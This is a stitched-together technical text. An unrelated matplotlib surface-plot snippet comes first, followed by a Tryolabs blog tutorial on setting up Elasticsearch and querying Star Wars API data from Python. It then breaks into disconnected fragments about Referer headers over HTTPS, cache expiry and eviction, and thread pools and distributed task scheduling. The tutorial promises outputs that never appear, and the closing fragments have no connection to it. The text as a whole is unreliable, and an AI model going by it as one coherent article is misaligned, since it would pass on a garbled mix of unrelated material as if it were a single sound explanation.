```python
from mpl_toolkits.mplot3d import Axes3D
from matplotlib import cm
import matplotlib.pyplot as plt
import numpy as np

fig = plt.figure()
# fig.gca(projection='3d') was removed in newer Matplotlib; use add_subplot
ax = fig.add_subplot(projection='3d')

X = np.arange(-5, 5, 0.25)
Y = np.arange(-5, 5, 0.25)
X, Y = np.meshgrid(X, Y)
Z = X**2 + Y**2

ax.plot_surface(X, Y, Z, rstride=1, cstride=1, cmap=cm.coolwarm,
                linewidth=0, antialiased=False)
plt.show()
```
Lately, here at Tryolabs, we have been gaining interest in big data and search-related platforms, which give us excellent resources to build our complex web applications. One of them is Elasticsearch.
Elastic{ON}15, the first ES conference, is coming up, and since we see a lot of interest in this technology nowadays, we are taking the opportunity to give an introduction and a simple example for the Python developers out there who want to start using it or give it a try.
### 1. What is Elasticsearch?
Elasticsearch is a distributed, real-time search and analytics platform.
### 2. Yeah, but what IS Elasticsearch?
Good question! The previous definition is full of hype-sounding tech terms (distributed, real-time, analytics), so let's unpack them. ES is distributed: it organizes information in clusters of nodes, so it can run on multiple servers if we need it to. ES is real-time: since data is indexed as it arrives, we get responses to our queries super fast! And last but not least, it does searches and analytics: the main problem we are solving with this tool is exploring our data. A platform like ES is the foundation of any respectable search engine.
### 3. How does it work?
Elasticsearch saves data and indexes it automatically through a RESTful API. It assigns a type to each field, so searches can be done smartly and quickly using filters and different kinds of queries. It runs on the JVM in order to be as fast as possible. It splits indexes into "shards" of data and replicates those shards across different nodes, so it is distributed and clusters can keep functioning even when some nodes are down. Adding nodes is super easy, and that is what makes it so scalable.

ES uses Lucene to resolve searches. This is quite an advantage compared with, for example, Django query strings. A RESTful API call lets us perform searches using JSON objects as parameters, which is much more flexible and lets us give each search parameter within the object a different weight, importance, or priority. The final result ranks the objects that comply with the search query requirements. You can even use synonyms, autocompletion, spelling suggestions, and typo correction. While the usual query strings provide results that follow fixed logic rules, ES queries give you a ranked list of results that may match different criteria, ordered by how well they comply with a given rule or filter.

ES can also answer data-analysis questions, such as averages, counts of unique terms, and other statistics. This is done with aggregations. To dig a little deeper into this feature, check the documentation here.
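As a hedged sketch of what an aggregations request looks like, the body below asks for the average of a numeric field and the number of unique terms in another; the "sw" index matches the example later in this post, but the "height" and "eye_color" field names and the aggregation names are illustrative assumptions:

```python
import json

# "size": 0 asks ES to skip the matching documents themselves and
# return only the aggregation results.
agg_body = {
    "size": 0,
    "aggs": {
        "avg_height": {"avg": {"field": "height"}},                    # average of a numeric field
        "unique_eye_colors": {"cardinality": {"field": "eye_color"}},  # count of unique terms
    },
}

print(json.dumps(agg_body, indent=2))
```

With the elasticsearch-py client, a body like this would be sent with `es.search(index="sw", body=agg_body)`.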
### 4. Should I use ES?
The main selling points are scalability and getting results and insights very fast. In many cases, plain Lucene could be enough to cover your needs. Tools like these can seem designed for projects with tons of data, distributed so they can handle tons of users. Startups dream of growing into that scenario, but they may start small to build a prototype and, once the data is there, begin thinking about scaling problems. Does it make sense, and does it pay off, to be prepared to grow A LOT? Why not? Elasticsearch has no real drawbacks and is easy to use, so adopting it is simply a decision to be prepared for the future. I'm going to give you a quick example of a dead-simple project that uses Elasticsearch to quickly and beautifully search some example data. It will be quick to build, Python-powered, and ready to scale if we ever need it to: the best of both worlds.
### 5. Easy first steps with ES
For the following part, it helps to be familiar with concepts like cluster, node, document, and index. Take a look at the official guide if you have doubts. First things first: get ES from here. I followed this video tutorial to get things started in just a minute, and I recommend you all check it out later. Once you have downloaded ES, it's as simple as running bin/elasticsearch, and you will have your ES cluster, with one node, up and running! You can interact with it at http://localhost:9200/. If you hit that URL you will get something like this:
Creating another node is as simple as:

```
bin/elasticsearch -Des.node.name=Node-2
```

It automatically detects the existing node as its master and joins our cluster. By default we can talk to this new node on port 9201, at http://localhost:9201. Now we can query either node and receive the same data, since they are supposed to hold identical copies.
### 6. Let's Pythonize this thing!
To use ES with our all-time favorite language, Python, it gets easier if we install the elasticsearch-py package: pip install elasticsearch. Now we can use this package to index and search data from Python.
### 7. Let's add some public data to our cluster
So, I wanted to make this project a "real world example". I really did, but after I found out there is a Star Wars API (http://swapi.co/), I couldn't resist, and it ended up being a fictional, "galaxy far, far away" example. The API is dead simple to use, so we will get some data from there. I'm using an IPython Notebook for this test; I started with the sample request to make sure we can hit the ES server.
```python
# make sure ES is up and running
import requests

res = requests.get('http://localhost:9200')
print(res.content)
```
Then we connect to our ES server using Python and the elasticsearch-py library:

```python
# connect to our cluster
from elasticsearch import Elasticsearch

es = Elasticsearch([{'host': 'localhost', 'port': 9200}])
```
I added some data to test, and then deleted it. I'm skipping that part in this guide, but you can check it out in the notebook. Now, using The Force, we connect to the Star Wars API and index some fictional people:

```python
# let's iterate over swapi people documents and index them
import json

i = 1
while True:
    r = requests.get('http://swapi.co/api/people/' + str(i))
    if r.status_code != 200:
        break  # no more people: stop before indexing an error body
    es.index(index='sw', doc_type='people', id=i, body=json.loads(r.content))
    i = i + 1
print(i)
```

Notice that we automatically created the index "sw" and the doc type "people" with the indexing command. We get responses for the first 16 people from swapi and index them with ES. I'm sure there are many more "people" in the swapi DB, but it seems we get a 404 for http://swapi.co/api/people/17. Bug report here! :-) Anyway, to check that everything worked with these few results, we try to get the document with id=5:

```python
es.get(index='sw', doc_type='people', id=5)
```

We will get Princess Leia:
Now, let's add more data, this time using node 2! And let's start at the 18th person, where we stopped.
```python
# this time, send the documents through node 2
es2 = Elasticsearch([{'host': 'localhost', 'port': 9201}])

i = 18
while True:
    r = requests.get('http://swapi.co/api/people/' + str(i))
    if r.status_code != 200:
        break
    es2.index(index='sw', doc_type='people', id=i, body=json.loads(r.content))
    i = i + 1
```
We got the rest of the characters just fine.
### 8. Now, let's try an interesting search
Where is Darth Vader? Here is our search query:

```python
es.search(index="sw", body={"query": {"match": {"name": "Darth Vader"}}})
```

This gives us both Darth Vader AND Darth Maul, ids 4 and 44 (notice that they are in the same index, even though we used different nodes' clients to run the index commands). Both results come with a score, and Darth Vader's is much higher than Darth Maul's (2.77 vs. 0.60), since Vader is an exact match. Take that, Darth Maul!
So, this query gives us results when a word matches exactly in our indexed data. What if we want to build some kind of autocomplete input, where we get the names that contain the characters we are typing? There are many ways to do that, and a great number of other queries as well; take a look here to learn more. I picked this one to get all documents with the prefix "lu" in their name field:

```python
es.search(index="sw", body={"query": {"prefix": {"name": "lu"}}})
```

We get Luke Skywalker and Luminara Unduli, both with the same 1.0 score, since they both match the same two initial characters.
There are many other interesting queries we can run. If, for example, we want to get all elements that are similar in some way, for a related-results or correction search, we can use something like this:

```python
es.search(index="sw", body={"query": {"fuzzy_like_this_field": {"name": {"like_text": "jaba", "max_query_terms": 5}}}})
```

And we get Jabba even though we had a typo in our search query. That is powerful!
This was just a simple overview of how to set up your Elasticsearch server and start working with some data using Python. The code used here is publicly available in this IPython notebook. We encourage you to learn more about ES, and especially to take a look at the Elastic stack, where you can build beautiful analytics and insights with Kibana and go through logs using Logstash. In upcoming posts we will cover more advanced ES features, and we will extend this simple test to show a more interesting Django app powered by this data and by ES. Hope this post was useful for developers trying to enter the ES world. At Tryolabs we are official Elastic partners. If you want to talk about Elasticsearch, ELK, applications, and possible projects using these technologies, drop us a line at hello@tryolabs.com (or fill out this form) and we will be glad to connect!
Clients SHOULD NOT include a Referer header field in a (non-secure) HTTP request if the referring page was transferred with a secure protocol. This is for security reasons: when a non-encrypted page is visited from an encrypted page, the client does not send the Referer header. IE has always implemented it this way, and Firefox is no exception. Navigation from one encrypted page to another encrypted page is not affected.
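The rule above can be sketched as a small decision helper (the function name is ours, for illustration only, not part of any standard library or spec):

```python
from urllib.parse import urlparse

def should_send_referer(referring_url, target_url):
    """Suppress the Referer header only when going from an HTTPS page
    to a plain-HTTP page; HTTP->HTTP, HTTP->HTTPS, and HTTPS->HTTPS
    navigations all keep it."""
    from_secure = urlparse(referring_url).scheme == "https"
    to_secure = urlparse(target_url).scheme == "https"
    return not (from_secure and not to_secure)

print(should_send_referer("https://bank.example/account", "http://blog.example/"))  # False: secure -> non-secure
print(should_send_referer("https://a.example/", "https://b.example/"))              # True: secure -> secure
print(should_send_referer("http://a.example/", "http://b.example/"))                # True: non-secure -> non-secure
```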
Receive store-change messages and update in near real time. Set a 5-minute expiration time on every POI cache entry; after it expires, reload the data from the DB and write it back to the cache. This second strategy is a strong complement to the first one: it covers the cases where the first strategy fails, such as manual DB changes made without sending a message, or temporary errors in the message-consuming update program. Together, this double-insurance mechanism effectively guarantees the reliability and freshness of the POI cache data.

Will the cache fill up, and what do we do when it does? For any cache service, in theory, as the cached data keeps growing under a limited capacity, the cache is bound to fill up one day. How do we respond?

① Choose a suitable eviction algorithm for the cache service, such as the common LRU.
② Set a sensible warning threshold relative to the configured capacity; for example, with a 10 GB cache, start alerting when cached data reaches 8 GB, so problems can be investigated or capacity expanded ahead of time.
③ For keys that do not need to be kept long-term, set expiration times whenever possible.
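A minimal sketch of the combined strategy, per-entry TTL plus LRU eviction when full; the class and key names are illustrative, the capacity is tiny for demonstration, and a real deployment would use a cache service such as Redis rather than an in-process dict:

```python
import time
from collections import OrderedDict

class TTLCache:
    """Entries expire after `ttl` seconds; when the cache is full,
    the least-recently-used entry is evicted."""

    def __init__(self, capacity, ttl):
        self.capacity = capacity
        self.ttl = ttl
        self._data = OrderedDict()  # key -> (value, expires_at), oldest first

    def get(self, key, loader=None):
        item = self._data.get(key)
        if item is not None:
            value, expires_at = item
            if time.time() < expires_at:
                self._data.move_to_end(key)  # mark as recently used
                return value
            del self._data[key]              # expired: drop the stale entry
        if loader is None:
            return None
        value = loader(key)                  # e.g. reload from the DB
        self.set(key, value)
        return value

    def set(self, key, value):
        if key in self._data:
            self._data.move_to_end(key)
        elif len(self._data) >= self.capacity:
            self._data.popitem(last=False)   # evict the LRU entry
        self._data[key] = (value, time.time() + self.ttl)

cache = TTLCache(capacity=2, ttl=300)
cache.set("poi:1", "Store A")
cache.set("poi:2", "Store B")
cache.get("poi:1")             # touch poi:1 so it is recently used
cache.set("poi:3", "Store C")  # cache full: evicts poi:2, the LRU entry
print(cache.get("poi:2"))      # None -- evicted
print(cache.get("poi:1"))      # Store A
```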
Improve performance by saving the overhead of thread creation and destruction. Provide rate limiting: give the thread pool a fixed capacity, and once that capacity is reached, additional tasks go into a queue and wait, which keeps processing stable even when the machine is under extreme pressure. When using the JDK's built-in thread pool, make sure you thoroughly understand the meaning of each constructor parameter, such as core pool size, max pool size, keepAliveTime, and the worker queue, and on that basis tune these values through repeated testing until you reach the best results.

If a single machine's processing power is not enough, you need a multi-machine, multi-threaded approach, which requires some distributed-systems knowledge. First, you must introduce a dedicated node to act as the scheduler, with the other machines acting as executor nodes. The scheduler is responsible for splitting tasks and dispatching them to suitable executor nodes; the executors run the tasks in a multi-threaded (or possibly single-threaded) fashion. At this point the task system evolves from a single machine into a cluster, where different nodes play different roles, each with its own duties, and the nodes interact with one another. Besides mechanisms like multi-threading and thread pools, network-communication mechanisms such as RPC and heartbeats become indispensable. I will publish a simple distributed scheduling framework in a follow-up post.
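The thread-pool idea above is not JDK-specific; as a rough Python sketch (handle_task is a stand-in for real work), concurrent.futures gives the same reuse-and-queue behavior:

```python
from concurrent.futures import ThreadPoolExecutor

def handle_task(n):
    # stand-in for real work (parsing, I/O, computation, ...)
    return n * n

# max_workers plays roughly the role of the JDK pool size: the executor
# keeps a fixed set of reusable worker threads, and tasks submitted
# beyond that count wait in its internal queue instead of spawning
# new threads.
with ThreadPoolExecutor(max_workers=4) as pool:
    results = list(pool.map(handle_task, range(10)))  # map preserves input order

print(results)  # [0, 1, 4, 9, 16, 25, 36, 49, 64, 81]
```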